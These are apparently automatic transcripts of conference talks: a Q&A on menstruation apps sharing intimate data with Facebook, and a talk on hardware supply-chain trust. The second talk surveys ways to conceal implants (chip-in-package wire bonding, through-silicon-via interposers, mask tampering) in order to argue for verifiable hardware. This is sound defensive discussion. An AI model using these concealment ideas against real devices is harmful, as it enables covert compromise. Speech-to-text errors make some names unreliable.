obstacle because you can add them, if it's a router device, you can add them to the system store, and then they are trusted by all the apps on the device. The problem we're now hitting is that Android 9 and 10 have TLS 1.3, and TLS 1.3 detects that there's a man in the middle, or at least it tries to and might terminate the connection. This is a bit of a problem. So currently, all our research is still running on Android 8.1 devices. This isn't going to be sustainable long term, though. Four. Hi. Thank you for the great talk. Your research is obviously targeted in a constructive, critical way towards companies that are making apps surrounding menstrual research. Did you learn anything from this context that you would want to pass on to people who research this area more generally? I'm thinking, for example, of Fatima and Corb in the US who've done microdosing research on LSD and are starting a breakout study on menstrual issues. I think, and this is why I was concluded on this, I think there's still a lot of research that needs to be done in terms of the sharing. And obviously, I think anything that touches on people's health is a key priority because it's something people relate very strongly to. The consequences, especially in the US, for example, of sharing health data like this, of having data, even like your blood pressure and so on. What are the consequences if those information are going to be shared, for example, with insurance companies and so on? So this is why I think it's absolutely essential to have a better understanding of the data collection and sharing practices of the services the moment when you have health data that's being involved. Yeah, because we often focus about this being an advertising issue, but in that sense as well, like insurance and even credit referencing and all sorts of other things become problematic, especially when it comes to pregnancy related. Yeah, even employers could be after this kind of information. Six. Hi. I'm wondering if there is an easy way or a tool which we can use to detect if apps are using our data or reporting them to Facebook or whatever, or if we can even use those apps but block this data from being reported to Facebook? Yeah, so you can file all of Facebook, graph.facebook.com and stop sending data. But there's a few issues here. So firstly, this audience can do this. Most users don't have the technical nuance to know what needs to be blocked, what doesn't necessarily need to be blocked. It's on the companies to be careful with users' data. It's not up to the users to try and defend against. It shouldn't be on the user to defend against malicious data sharing or data. And also one interesting thing was that Facebook had put this in place of where you could opt out from data sharing with the apps you're using. But that only works if you're a Facebook user. And as I said, this data has been collected whether you're a user or not. So in a sense, for people who are on Facebook users, they couldn't opt out of this. The Facebook SDK that developers are integrating, the default state for sharing of data is on, the flag is true. And although they have a long legal text on the help pages for their developer tools, it's like unless you have a decent understanding of local data protection practice or local protection law, it's not something that most developers are going to be able to understand why this flag should be something different from on, why there's loads of flags in the SDK, which flag should be on and off depending on which jurisdiction you're selling to. Your users are going to be in. Do you know any good apps which don't share data and privacy friendly, probably even one that is open source? So I mean, the problem which is why I wouldn't want to vouch for any app is that even in the apps that, you know, where in terms of like the traffic analysis we've done, we didn't see any data sharing, as Chris was explaining, the data can be shared at a later stage and it'd be impossible for us to really find out. So I know I can't be vouching for any app. The problem is we can't even look at one specific moment in time to see whether data is being shared and what was good today might be bad tomorrow, what was bad yesterday might be good today. So I have been in Argentina recently speaking to a group of feminist activists and they have been developing an administration tracking app and their app was removed from the Google Play Store because it had illustrations that were deemed pornographic, but there were illustrations around medical related stuff. So even people who were trying to do the right thing going through the open source channels are still fighting a completely different issue when it comes to menstruation tracking. It's a very fine line. Three. So you can't hear. The mic's not working. Microphone three. Yes. Thanks for the great talk. I was wondering if the Graph API endpoint was actually in place to track menstruation data or is it more like a general purpose advertisement tracking thing or yeah. So my understanding is that there's two broad kinds of data that Facebook gets. There's automated app events that Facebook are aware of. So app open, app close, app install, relinking. Relinking is quite an important one for Facebook. It checks to see whether you already have a Facebook account logged in to log the app to your Facebook account from an understanding. There's also a load of custom events that the app developers can put in that is then collated back to a data set I would imagine on the other side. So when it comes to things like whether there's nausea or some of the other health issues, it's actually being cross referenced by the developer. Is that what's your question? Yes. I'm five. Microphone five. Can you repeat what you said in the beginning about the menstruation apps used in Europe, especially Clue and the period tracker? Yeah. So those are the most popular apps actually across the world, not just in Europe and US. A lot of them in terms of like the traffic analysis stage, a lot of them have not cleaned up their acts. So we don't see, we can't see any data sharing happening at that stage. But as I said, I can't be vouching for them and saying, oh yeah, those are safe and fine to use because we don't know what's actually happening to the data once it's been collected by the app. All we can say is that as far as the research we've done goes, we didn't see any data being shared. So like those apps you mentioned have been investigated by the Wall Street Journal and the New York Times or relatively recently. So they've been, had quite like a spotlight on them. So they've had to really up their game in a lot of ways, which is what we'd like everyone to do. But as Eva says, we don't know what else they might be doing with that data on their side, not necessarily in between the phone and the server, but from their server to another server. Microphone one. Hi. Thank you for the insightful talk. I have a question that goes in a similar direction. Do you know whether or not these apps, even if they adhere to GDPR rules, collect the data to then at a later point at least sell it to a higher, like the highest bidder because a lot of them are free to use. And I wonder like, what is their main goal? Possibly. I mean, advertisement is how they make profit. And so, I mean, the whole question about them trying to know if you're pregnant or not is so that this information can eventually be monetized through the target, the advertisement. When you're actually, when you're using those apps, you could see in some of the sites, like you're constantly being flat with all sorts of advertisement on the app. Whether they're selling it to externally or not, I can't tell. But what I can tell is, yeah, their business model is advertisement, so they are deriving profit from the data they collect. Absolutely. Again, on microphone one. Thank you. I was wondering if there was more of a big data kind of aspect to it as well because these are really interesting medical, like, information on women's cycles in general. Yeah. And the answer is like, I can't, this is a bit of a black box. And especially in the way, for example, that Facebook is using this data, like, we don't know. We can assume that this is like part of the, we could assume this is part of the profiling that Facebook does of both their users and their non-users. But the way this data is actually processed also by those apps through data brokers and so on, it's a bit of a black box. Question one. Yeah. Thank you a lot for your talk. And I have two completely different questions. The first one is you've been focusing a lot on advertising and how this data is used to sell to advertisers. But I mean, like, you aim to be pregnant or not, it's like, it has to be the best kept secret, at least in Switzerland for any female person. Because like, if you also want to get employed, your employer must not know whether or not you want to get pregnant. And so I would like to ask, like, how likely is it that this kind of data is also potentially sold to employers who might want to poke into your health and like reproductive situation. And then my other question is entirely different. Because we also know that female health is one of the least researched topics around and that's actually a huge problem. So Lidl is actually known about female health and the kind of data that these apps collect is actually a gold mine to do our own research on health issues that are specific for certain bodies, like female bodies. And so I would also like to know, like, how would it be possible to still gather this kind of data and still collect it but use it for like a beneficial purpose, like to improve knowledge on these issues? Sure. So, I mean, answer your first question. The answer will be similar to the previous answer I gave, which is, you know, it's a black box problem. It's like, it's very difficult to know exactly, you know, what's actually happening to this data. Obviously, GDPR is there to prevent some things from happening. So as we've seen from this app, like, they were, you know, towing a very blurry line. And so the risk, obviously, of, this is something that can't be relied. I can't be saying, oh, this is happening because I have no evidence that this is happening. But obviously, the risk, I must say, are multiple. The risk are like employers, as you say, that insurance companies that could get it, that political parties could get it and target their messages based on the information they have about your mood, about, you know, even the fact that you're trying to start a family. So yeah, there is like a very broad range of risk. The advertisement, we know for sure is happening because this is like the basis of their business model. The risk, the range of risk is very broad. To just expand that, like, again, as Eva said, we can't point out a specific example of any of this. But if you look at some of the other data brokers, so Experian is a data broker, they collect, they have a statutory response, or in the UK at least, they have a statutory job of being a credit reference agency, but they also run what is, I believe, the deemed data enrichment. And one of the things that employers can do is buy Experian data to, when hiring staff. Like, I can't say that this data ever ends up there, but there is people collecting data and using it for some level of auditing. And to answer your second question, I think this is a very important problem you point out is the question of like data inequality and whose data gets collected for what purpose. There is, I do quite a lot of work on delivery of state services, for example, when there are populations that are isolated, they're not using technology and so on, you might just be missing out on people, for example, who should be in need of healthcare, of state support and so on, just because you lack data about them. And so female health is obviously a very key issue. We literally lack sufficient health data about women on women's health specifically. Now in terms of how data is processed in medical research, this is actually protocol in place normally to ensure consent, to ensure explicit consent, to ensure that the data is properly collected. And so I think, I wouldn't want to mix the two just because the way those apps have been collecting data, if there's one thing to take out of this talk is that it's been nothing short of horrifying really, that data is being collected before and shared, before you even get your consent to anything. I wouldn't trust any of those private companies to really be the ones carrying, well, taking parts in medical research on those. So I agree with you that there is a need for better and more data on women's health, but I don't think any of those actors so far have proved to be trusted on this. Microphone 2. Yeah, thank you for this great talk. Short question. What do you think is the rationale of these menstruation apps to integrate the Facebook SDK if they don't get money from Facebook or being able to commercialize this data? Good question. It could be a mix of things. So sometimes it's literally the developers literally just have this as part of their tool chain and their workflow when they're developing apps. I don't necessarily know about these two peer attractors, other apps are developed by these companies, but in our previous work, which I presented last year, you find that some companies just produce a load of apps and they just use the same tool chain every time and that includes by default the Facebook SDK as part of their tool chain. And some of them include it for what I would regard as genuine purposes, like they want their users to share something or they want their users to be able to log in with Facebook. In those cases, they include it for what would be regarded legitimate reason. But a lot of them just don't ever actually, they haven't integrated it, does app events and they don't ever really use anything of it other than that. And then a lot of developers seem to be quite unaware of the default state is verbose and how it sends data to Facebook. Yeah, maybe we can close with one last question for me. You tested surely a bunch of apps, how many of them do certificate pinning? You see this as a widespread policy or they just? Not really. I've yet to see, I did have a problem doing analysis where certificates been pinned. As I say, TLS 1.3 is proven to be more problematic than pinning. Yeah. Okay. Well, thank you so much. And yeah. Thank you for saying that. All right. You
In September 2019, Privacy International released exclusive research on the data-sharing practices of menstruation apps. Using traffic analysis, we shed lights on the shady practices of companies that shared your most intimate data with Facebook and other third parties. In this talk we will go over the findings of this research, sharing the tools we have used and explaining why this is not just a privacy problem, but also a cybersecurity one. This talk will also be a call to action to app developers whose tools have concrete impact on the lives of their users. Does anyone – aside from the person you had sex with – know when you last had sex? Would you like them to know if your partner used a condom or not? Would you share the date of your last period with them? Does that person know how you feel on any particular day? Do they know about your medical history? Do they know when you masturbate? Chances are this person does not exist, as there is only so much we want to share, even with our most intimate partner. Yet this is all information that menstruation apps expect their users to fill. With all this private information you would expect those apps to uphold the highest standards when it comes to handling the data they collect. So, Privacy International set out to look at the most commonly used menstruation apps to find out if that was the case. Using traffic analysis, we wanted to see if those apps were sharing data with third parties and Facebook in particular, through the Facebook SDK. Our research shed light on the horrific practices of some menstruation apps that shared their users’ most intimate data – about their sexual life, their health and lifestyle – with Facebook and others. In this talk, we will take you through the research we have conducted by using Privacy International’s publicly available and free testing environment. We will briefly explain how the testing environment work and we will showcase the menstruation apps that have the most problematic practices to show you how very granular and intimate data is shared with third parties and security implications.
10.5446/53182 (DOI)
Welcome everybody for our very first talk on the first day of Congress. The talk is open source is insufficient to solve trust problems and hardware. Although there is a lot to be said for free and open software, it is unfortunately not always inherently more secure than proprietary or close software. The same goes for hardware as well. This talk will take us into the nitty gritty bits of how to build trustable hardware and how it has to be implemented and brought together with the software in order to be secure. We have one speaker here today. It's Bunny. He is a hardware and film hacker. But actually the talk was worked on by three people. So it's not just Bunny but also Sean Zobbs Cross and Tom Marble. The other two are not present today. But I would like you to welcome our speaker Bunny with a big warm round of applause and have a lot of fun. Good morning everybody. Thanks for braving the crowds and making it into the Congress. And thank you again to the Congress for giving me the privilege to address the Congress again this year. Very exciting being the first talk of the day. Had front problems. I'm running from a PDF backup. So we'll see how this all goes. Good thing I make backups. So the topic of today's talk is open source is insufficient to solve trust problems and hardware and sort of some things we can do about this. So my background is I'm a big proponent of open source hardware. I love it. And I've built a lot of things in open source using open source hardware principles. But there's been sort of a nagging question to me about like some people would say things like oh well you know you build open source hardware because you can trust it more. And there's been sort of this gap in my head and this talk tries to distill out that gap in my head between trust and open source and hardware. So I'm sure people have opinions on which browsers you would think is more secure or trustable than the others. But the question is why might you think one is more trustable than the others. You have everything from Firefox and Iced Weasel down to the Samsung custom browser or the Xiaomi custom browser. Which one would you rather use for your browsing if you had to trust something. So I'm sure people have their biases and they might say that open is more trustable. But why do we say open is more trustable. Is it because we actually read the source thoroughly and check it every single release for this browser. Is it because we compile our source our browsers from source before we use them. No actually we don't have the time to do that. So let's take a closer look as to why we like to think that open source software is more secure. So this is a kind of a diagram of a life cycle of say a software project. You have a bunch of developers on the left. They'll commit code into some source management program like Git. It goes to a build and then ideally some person who carefully manages a key signs that build goes into an untrusted cloud. Then gets done load on users disks pulled into RAM run by the user at the end of the day. Right. So the reason why actually we find that we might be able to trust things more is because in the case of open source anyone can pull down that source code like someone doing reproducible builds or an audit of some type build it confirm that the hashes match and that the keys are all set up correctly. And then the users also have the ability to know developers and sort of enforce community norms and standards upon them to make sure that they're acting in sort of in the favor of the community. So in the case that we have bad actors who want to go ahead and tamper with builds and clouds and all the things in the middle it's much more difficult. So open is more trustable because we have tools to transfer trust in software. Things like hashing things like public keys things like Merkel trees right and also in the case of open versus closed we have social networks that we can use to reinforce our community standards for trust and security. Now it's worth looking a little bit more into the hashing mechanism because this is a very important part about the software trust chain. So I'm sure a lot of people know what hashing is for people who don't know. It basically takes a big pile of bits and turns them into a short sequence of symbols so that a tiny change in the big pile of bits makes a big change in the output symbols and also knowing those symbols doesn't reveal anything about the original file. So in this case here the file on the left is hashed to sort of cat mouse panda bear and the file on the right hashes to peach snake pizza cookie. And the thing is as you may not even have noticed necessarily that there was that one bit changed up there but it's very easy to see that short string of symbols had changed so you don't actually have to go through that whole file and look for that needle in the haystack you have this hash function that tells you something has changed very quickly. Then once you've computed the hashes we have a process called signing where a secret key is used to encrypt the hash uses decrypt that using the public key to compare against a locally computed hash. We're not trusting the server to compute the hash we reproduce it on our side and then we can say that it's now difficult to modify that file or the signature without detection. Now the problem is that there's a time of check, time of use issue with the system even though we have this mechanism if we decouple the point of check from the point of use it creates a man in the middle opportunity or person in the middle if you want. The thing is that it's a class of attacks that allows someone to tamper with data as it is in transit. I'm kind of symbolizing this evil guy because hackers all wear hoodies and they also keep us warm as well in very cold places. So now an example of a time of check, time of use issue is that if say a user downloads a copy of the program onto their disk and they just check it after they download it to the disk and they say okay great that's fine later on an adversary can then modify the file on the disk as before it's copied to RAM and now actually the user even though they download the correct version of file they're getting the wrong version into the RAM. So the key point is the reason why in software we feel it's more trustable is we have a tool to transfer trust and ideally we place that point of check as close to the user as possible. So ideally we're sort of putting keys into the CPU or some secure enclave that just before you run it you've checked that that software is perfect and has not been modified. Now an important clarification is that it's actually more about the place of check versus the place of use whether you checked one second prior or a minute prior doesn't actually matter. It's more about checking the copy that's closest to the thing that's running it. We don't call it Pockpoo because it just doesn't have quite the same ring to it. But now this is important. The reason why I emphasize place of check versus place of use is this is why hardware is not the same as software in terms of trust. The place of check is not the place of use or in other words trust and hardware is a talk to problem all the way down the supply chain. So the hard problem is how do you trust your computers? So we have problems where we have firmware, pervasive hidden bits of code that are inside every single part of your system that can break abstractions and there's also the issue of hardware implants so it's tampering or adding components that can bypass security in ways that we're not according to the specification that you're building around. So from the firmware standpoint, it's more here to acknowledge as an issue. The problem is this is actually a software problem. The good news is we have things like openness and runtime verification that go away to remedy these questions. If you're a big enough player or you have enough influence or something, you can coax out all the firmware blobs and eventually sort of solve that problem. The bad news is that you're still relying on the hardware to obediently run the verification. So if your hardware isn't running the verification correctly, it doesn't matter that you have all the source code for the firmware, which brings us to the world of hardware implants. So very briefly, it's worth thinking about how bad can this get? What are we worried about? What is the field if we really want to be worried about trust and security? How bad can it be? So I've spent many years trying to deal with supply chains. They're not friendly territory. There's a lot of reasons people want to screw with the chips in the supply chain. For example, here, this is a small ST microcontroller. It claims to be a secure microcontroller. Someone was like, ah, this is not secure. It's not behaving correctly. We digest off the top of it. On the inside, it's an LCX244 buffer. This was not done because someone wanted to tamper with the secure microcontroller. It's because someone wanted to make a quick buck. But the point is that that marking on the outside is convincing. You could have been any chip on the inside in that situation. Another problem that I've had personally is I was building a robot controller board that had an FPGA on the inside. We manufactured a thousand of these. And about 3% of them weren't passing tests. Set them aside. Later on, I pulled these units that weren't passing tests and looked them very carefully. And I noticed that all of the units, the FPGA units that weren't passing tests, had that white rectangle on them, which is shown in a more zoomed-in version. It turned out that underneath that white rectangle were the letters ES for engineering sample. So someone had gone in and laser blasted off the letters, which say that's an engineering sample, which means they're not qualified for regular production, blended them into the supply chain at a 3% rate, and managed to essentially double their profit at the other day. The reason why this works is because distributors make a small amount of money. So even a few percent actually makes them a lot more profit at the end of the day. But the key takeaway of this is just because 97% of your hardware is OK, it does not mean that you're safe. So it doesn't help to take one sample out of your entire set of hardware and say, oh, this is good. This is constructed correctly. Therefore, all of them should be good. That's a talk-to problem. 100% hardware verification is mandatory if you're worried about trust and verification. So let's go a bit further down the rabbit hole. This is a diagram, sort of an ontology of supply chain attacks. And I've kind of divided it into two axes. On the vertical axis is how easy is it to detect or how hard. So on the bottom, you might need a SEM, a scanning electron microscope, to do it. In the middle is an X-ray, a little specialized. And on the top is just visual or JTAG, like anyone can do it at home. And then from left to right is execution difficulty. Things are going to take millions of dollars in months. Things are going to take 10,000 weeks or a dollar in seconds. There's sort of several broad classes I've kind of outlined here. Adding components is very easy. Substitute components is very easy. We don't have enough time to really go into those. But instead, we're going to talk about kind of the two more scary ones, which are sort of adding a chip inside a package and IC modification. So let's talk about adding a chip in a package. This one has sort of grabbed a bunch of headlines. So there's sort of these in the Snowden files. We found these like NSA implants where they had put chips literally inside of connectors and other chips to modify the computer's behavior. Now it turns out that actually adding a chip in a package is quite easy. It happens every day. This is a routine thing. If you take open any SD card, micro SD card that you have, you're going to find that has two chips on the inside at the very least. One is a controller chip. One is a memory chip. In fact, they can stick 16, 17 chips inside of these packages today very handily. And so if you want to go ahead and find these chips, is the solution to go ahead and X-ray all the things? You just take every single circuit board and throw inside of an X-ray machine. Well this is what a circuit board looks like in the X-ray machine. Some things are very obvious. So on the left we have our ethernet magnetic jacks. And there's a bunch of stuff on the inside. Turns out those are all OK. Don't worry about those. And on the right we have our chips. And this one here, you may be sort of tempted to look and say, oh, I see this big sort of square thing on the bottom there. That must be the chip. It actually turns out that's not the chip at all. That's the solder pad that holds the chip in place. You can't actually see the chip because the solder is massing it inside the X-ray. So when we're looking at a chip inside of an X-ray, I've kind of given you a little key guide here. And the left is what it looks like, sort of in 3D. And the right is what it looks like in X-ray. Sort of looking from the top down, you're looking at ghostly outlines with very thin spirey wires coming out of it. So if you were to look at a chip and chip on an X-ray, this is actually an image of a chip. So the cross section, you can see there's several pieces of silicon that are stacked in top of each other. And if you could actually do an edge on X-ray of it, this is what you would see, unfortunately you'd have to take the chip off the board to do the edge on X-ray. So what you do is you have to look at it from the top down. And when you look at it from the top down, all you see are basically some straight wires. Like, I can't, it's not obvious from that top down X-ray whether you're looking at multiple chips, eight chips, one chip, how many chips are on the inside of that because the wire bonds all stitch perfectly and overlap over the chip. So this is what the chip and chip scenario might look like. You have a chip that's sitting on top of a chip and wire bonds just sort of going a little bit further on from the edge. And so in the X-ray, the only kind of difference you see is a slightly longer wire bond in some cases. So it's actually, it's not, you can find these, but it's not like obvious that you've found it implant or not. So looking for silicon's heart, silicon is relatively transparent to X-rays. A lot of things, masquot, copper traces, solder, mass the presence of silicon. This is like another example of a wire bonded chip under an X-ray. There's some mitigations. If you have a lot of money, you can do computerized tomography. It'll build up the 3D image of the chip. You can do X-ray diffraction spectroscopy, but it's not a foolproof method. And so basically the threat of wire bond package is actually a very well understood commodity technology. It's actually quite cheap. I was actually doing some wire bonding in China the other day. This is a wire bonding machine. I looked up the price of $7,000 for a used one. And you basically just walk into the guy with a picture of where you want the bonds to go. He sort of picks them out, programs the machine's motion once, and he just plays it back over and over again. So if you want to go ahead and modify a chip and add a wire bond, it's not as crazy as it sounds. The mitigation is that this is a bit detectable inside X-rays. So let's go down the rabbit hole a little further. So there's another concept I want to throw at you, it's called the through silicon via. So this here is a cross section of a chip. On the bottom is the base chip. And the top is a chip that's only 0.1 to 0.2 millimeters thick, almost the width of a human hair. And they actually have drilled via through the chip so you have circuits on the top and circuits on the bottom. So this is kind of used as sort of putting an interposer in between different chips. Also used to stack DRAM and HBM. So this is a commodity process. It's available today. It's not science fiction. And the second concept I want to throw you is a thing called a wafer level chip scale package, WLCSP. This is actually a very common method for packaging chips today. Basically it's solder balls directly on top of chips. They're everywhere. If you look inside of like an iPhone, basically almost all the chips are WLCSP package types. Now if we were to take the wafer level chip scale package and cross section and look at it, it looks like a circuit board with some solder balls and the silicon itself with some backside passivation. If you go ahead and combine this with a through silicon via implant, a man in the middle attack using through silicon via, this is what it looks like at the other day. You basically have a piece of silicon that's the size of the original silicon sitting on the original pads in basically all the right places with the solder balls masking the presence of that chip. So it's actually basically a nearly undetectable implant if you want to execute it. If you go ahead and look at the edge of the chip, they already have seams on the side. So you can't even just look at the side and say, oh, I see a seam on a chip. Therefore it's a problem. The seam on the edge, a lot of times it's because they have different coatings on the back or passivations, these types of things. So if you really want to sort of say, OK, how well can we hide an implant? This is probably the way I would do it. It's logistically actually easier than a wire bond implant because you don't have to get the chips in wire bondable format. You literally just buy them off the internet. You can just clean off the solder balls with a hot air gun. And then the hard part is building that through silicon via template for doing the attack, which will take some hundreds of thousands of dollars to do and probably a mid-end fab. But if you have almost no budget constraint and you have a set of chips that are common and you want to build a template for, this could be a pretty good way to hide an implant inside of a system. So that's sort of adding chips inside packages. Let's talk a bit about chip modification itself. So how hard is it to modify the chip itself? Let's say we've managed to eliminate the possibility someone's added chip, but what about the chip itself? And this sort of goes out. A lot of people have said, hey, buddy, why don't you spin like an open source silicon processor? This will make it trustable, right? This is not a problem. Well, let's think about the attack surface of IC fabrication processes. So on the left-hand side here, I've got kind of a flow chart of what IC fabrication looks like. You start with a high-level chip design. It's an RTL, like Verilog, DHDL, these days now Python. You go into some back-end. You have a decision to make. Do you own your back-end tooling or not? And so we'll go into this a little bit more. If you don't, you trust the fab to compile it and assemble it. If you do, you assemble the chip with some blanks for what's called hard IP. We'll get into this. And then you trust the fab to assemble that, make masks, and go to mass production. So there's three areas that I think are kind of ripe for tampering. Netlist tampering, hard IP tampering, and mass tampering. We'll go into each of those. So netlist tampering, you might, a lot of people think that, of course, if you wrote the RTL, you're going to make the chip. It turns out that's actually kind of a minority case. We hear about that. That's on the right-hand side, called customer-owned tooling. That's when the customer does the full flow down to the mass set. The problem is it costs $7 million and a lot of extra head count of very talented people to produce these. And we usually only do it for flagship products, like CPUs and GPUs, high-end routers, these sorts of things. Most, I would say, most chips tend to go more towards what's called an ASIC side, application-specific integrated circuit. What happens is that the customer will do some RTL, maybe a high-level floor plan. And then the silicon foundry or service will go ahead and do the place and route, the IP integration, the paddling. This is quite popular for cheap support chips, like your baseband management controller inside your server. Probably went to this flow. Disk controllers will probably go through this flow. Mid to Ion, Ion controllers. All those peripheral chips that we don't like to think about, that can handle our data, probably go through a flow like this. And to give you an idea of how common it is, but how little you've heard of it, there's a company called Sock Ion Next. They're a billion-dollar company, actually. You've probably never heard of them. And they offer services where basically you can just throw a spec over the wall and they'll build a chip to you, all the way to the point where you've done logic synthesis and physical design. And then they'll go ahead and do the manufacturing and test and sample shipment for it. So then, OK, fine. Obviously, if you care about trust, you don't do an ASIC flow. You're pawning up the millions of dollars and you do a cop flow, right? Well, there is a weakness in cop flows, and this is called the hard IP problem. So this here on the right-hand side is an amoeba plot of the standard cells alongside a piece of SRAM. I'll highlight this here. The image wasn't great for presentation, but this region here is the SRAM block. And all those little colorful blocks are standard cells representing your AND gates and AND gates and that sort of stuff, right? What happens is that the Foundry will actually ask you just to leave an open spot on your mass design and they'll go ahead and merge in the RAM into that spot just before production. The reason why they do this is because stuff like RAM is a carefully guarded trade secret. If you can increase the RAM density of your Foundry process, you can get a lot more customers. There's a lot of know-how in it. And so Foundry's tend not to want to share the RAM. You can compile your own RAM. There are open RAM projects, but their performance and their density is not as good as the Foundry specific ones. So in terms of hard IP, what are the blocks that tend to be hard IP? Stuff like RF and analog. So your phase lock loops, your ADCs, your DAX, your band gaps. RAM tends to be hard IP. ROM tends to hard IP. EFUSE that stores your keys is going to give into you as an opaque block. The pad ring around your chip, the thing that protects your chip from ESD, that's going to be an opaque block. Basically, all the points you need to backdoor your RTL are going to be trusted to the Foundry in a modern process. So, OK, let's say, fine, we're going to go ahead and build all of our own IP blocks as well. We're going to compile our RAMs, do our own I.O. Everything, right? So we're safe, right? Well, it turns out that masks can be tampered with post-processing. So if you're going to do anything in a modern process, the mask designs change quite dramatically from what you drew them to what actually ends up in the line. They get fractured into multiple masks. They have resolution correction techniques applied to them. And then they always go through an editing phase, right? So masks are not born perfect, right? Masks have defects on the inside. And so you can look up papers about how they go, and they inspect the mask every single line on the inside. When they find an error, they'll go ahead and patch over it. They'll go ahead and add bits of metal, and then take away bits of glass to go ahead and make that mask perfect, or better in some way, if you have access to the editing capability, right? So what can you do with mask editing? Well, there's a lot of papers that have been written on this. You can look up ones on, for example, dopant tampering. This one actually has no morphological change. You can't look at it under a microscope and detect dopant tampering. You have to have something and do some, either you have to do some wet chemistry or some extra spectroscopy to figure it out. And this allows for circuit level change without a gross morphological change to the circuit. And so this can allow for tampering with things like RNGs, some logic paths. There are oftentimes spare cells inside of your ASIC, because everyone makes mistakes, including chip designers. And so you want to patch over that. That can be done at the mask level, signal bypassing these types of things. So there are some attacks that can still happen at the mask level. So that's a very quick sort of idea of how bad can it get when you talk about the time of check time to use trust problem inside the supply chain. So a short summary of implants is that there's a lot of places to hide them. Not all of them are expensive or hard. I talked about some of the more expensive or hard one. But remember, wire bonding is actually a pretty easy process. It's not hard to do. And it's hard to detect. And there's really no actual essential correlation between detection difficulty and difficulty in attack if you're very careful in planning the attack. So implants are possible. Let's agree on that, maybe. So now the solution is we should just have trustable factories. Let's go ahead and bring the fabs to the EU. Let's have a fab in my backyard or whatever it is, these types of things. Let's make sure all the workers are logged and registered, that sort of thing. Well, let's talk about that. So if you think about hardware, there's you, right? And then we can talk about evil maids. But let's not actually talk about those, because that's actually kind of a minority case to worry about. But let's think about how stuff gets to you. There's a distributor who goes to a courier who gets to you. All right, so we've gone and done all this stuff for the trustable factory. But it's actually documented that couriers have been intercepted and implants loaded, by for example, the NSA on Cisco products. Now you don't even have to have access to couriers now, thanks to the way modern commerce works. Other customers can go ahead and just buy a product, tamper with it, seal it back in the box, send it back to your distributor, and then maybe you get one, right? That can be good enough, particularly if you know a corporation is a particular area you're targeting them, you buy a bunch of hard drives from the area, seal them up, send them back, and eventually when them ends up in the right place, then you've got your implant, right? So there's a great talk last year at 35C3. I recommend you check it out. That talks a little bit more about the scenario, sort of removing tamper stickers and the possibility that some crypto wallets were sent back into supply chain that they've been tampered with. And then let's take that back. We have to now worry about the wonderful people in customs. We have to worry about the people in the factory who have access to your hardware. And so if you cut to the chase, it's a huge attack surface in terms of the supply chain, right? From you to the courier to the distributor, customs, box build, the box build factory itself oftentimes will use gray market resources to help make themselves a little more profitable, right? You have distributors who go to them who you don't even know who those guys are, PCB assembly, components, boards, chip fad, packaging, the whole thing, right? Every single point is a place where someone can go ahead and touch a piece of hardware along the chain. So can open source save us in this scenario? Does open hardware solve this problem, right? Let's think about it. Let's go ahead and throw some developers with Git on the left-hand side. How far does it get, right? Well, we can have some continuous integration checks that make sure that the hardware is correct. We can have some open PCB designs. We can have some open PDK. But then from that point, it goes into a rather opaque machine. And then, okay, maybe we can put some tests on the very edge before exit the factory to try and catch some potential issues, right? But you can see all the area of other places where sort of a time of check to time of use problem can happen. And this is why I'm saying that open hardware on its own is not sufficient to solve this trust problem, right? And the big problem at the other day is that you can't hash hardware, right? There is no hash function for hardware. This is why I wanted to go through that earlier today. There's no convening easy way to basically confirm the correctness of your hardware before you use it. Some people say, well, Bonnie said once, oh, it's a bigger microscope, right? This is a, you know, I do some security reverse engineering stuff. This is true, right? So there's a wonderful technique called tachographic X-ray imaging. There's a great paper and nature about it where they take like a modern I7 CPU and they get down to the gate level non-destructively with it, right? It's great for reverse engineering and for design verification. The problem number one is it literally needs a building size microscope. It was done at the Swiss light source. That donut-shaped thing is the size of the light source for doing that type of verification, right? So you're not going to have one at your point of use, right? You're going to check it there and then probably query it to yourself. Again, time of check is not time of use. Problem number two, it's expensive to do, so verifying one chip only verifies one chip. And as I said earlier, just because 99.9% of your hardware is okay, doesn't mean you're safe. Sometimes all it takes is one server of 1,000 to break some fundamental assumptions that you have about your cloud. And random sampling just isn't good enough, right? I mean, would you random sample signature checks on software that you install? Download? No, you insist 100% check on everything. If you want that same standard of reliability, you have to do that for hardware. So then is there any role for open source and trustable hardware? Absolutely yes. Some of you guys may be familiar with it. A little guy on the right, the Spectre logo. So correctness is very, very hard. Your review can help fix correctness bugs, microarchitectural transparency can aid with the fixes and specter-like situations. So for example, we would love to be able to say we're entering a critical region, let's turn off all the microarchitectural optimizations, sacrifice performance, and then run the code securely and then go back into who cares what mode and just get done fast, right? That would be a switch I would love to have, but without that sort of transparency or without the ability to review it, we can't do that. Also community-driven features and community-owned designs is very empowering and make sure that we're sort of building the right hardware for the job and that it's upholding our standards. So there is a role. It's necessary, but it's not sufficient for trustable hardware. So now the question is, okay, can we solve the point of use hardware verification problem? Is it all gloom and doom from here on? Well, I didn't bring you guys here to tell you it's just gloom and doom. I've thought about this and I've kind of boiled it into three principles for building verifiable hardware. Three principles are that complexity is the enemy of verification. We should verify entire systems, not just components, and we need to empower end users to verify and seal their hardware. We'll go into this in the remainder of the talk. So the first one is that complexity is complicated, right? So without a hashing function, verification rolls back to bit by bit or atom by atom verification. So those modern phones just have so many components, even if I gave you the full source code for the sock inside of a phone down to the mass level, what are you going to do with it, right? How are you going to know that this mass actually matches the chip and those two haven't been modified, right? So more complexity, it's more difficult. So okay, the solution is let's go to simplicity, right? Let's just build things from discrete transistors. Someone's done this, the Monster 6502 is great. I love the project. Very easy to verify, runs at 50 kilohertz, right? So you're not going to do a lot with that. Okay, well, let's build processes that are visually inspectable processes. So let's go to 500 nanometers, you can see that with light. Okay, well, you know, 100 megahertz clock rate and a very high power consumption and you know, a couple of kilobytes of RAM probably is not going to really do it either, right? So the point of use verification is a trade off between ease of verification and features and usability, right? So these two products up here largely do the same thing, AirPods, right? And headphones on your head, right? AirPods have something on the order of tens of millions of transistors for you to verify. The headphone that goes on your head, like I can actually go to Maxwell's Equations and actually tell you how the magnets work from very first principles and there's probably one transistor on the inside of the microphone to go ahead and amplify the membrane and that's it, right? So this one, you do sacrifice some features and usability when you go to a headset, like you can't say, hey Siri and they'll listen to you and know what you're doing, but it's very easy to verify and know what's going on. So in order to start a dialogue on user verification, we have to sort of set a context. So I started a project called Be Trusted because the right answer depends on the context. I want to establish what might be a minimum viable, verifiable product and it's sort of like meant to be used verifiable by design and we think of it as a hardware software distro. So it's meant to be modified and changed and customized based upon the right context at the end of the day. This is a picture of what it looks like, I actually have a little prototype here, very, very, very early prototype here at the Congress if you want to look at it. It's a mobile device that is meant for sort of communication, sort of text-based communication and maybe voice. Authentication, so authenticated tokens 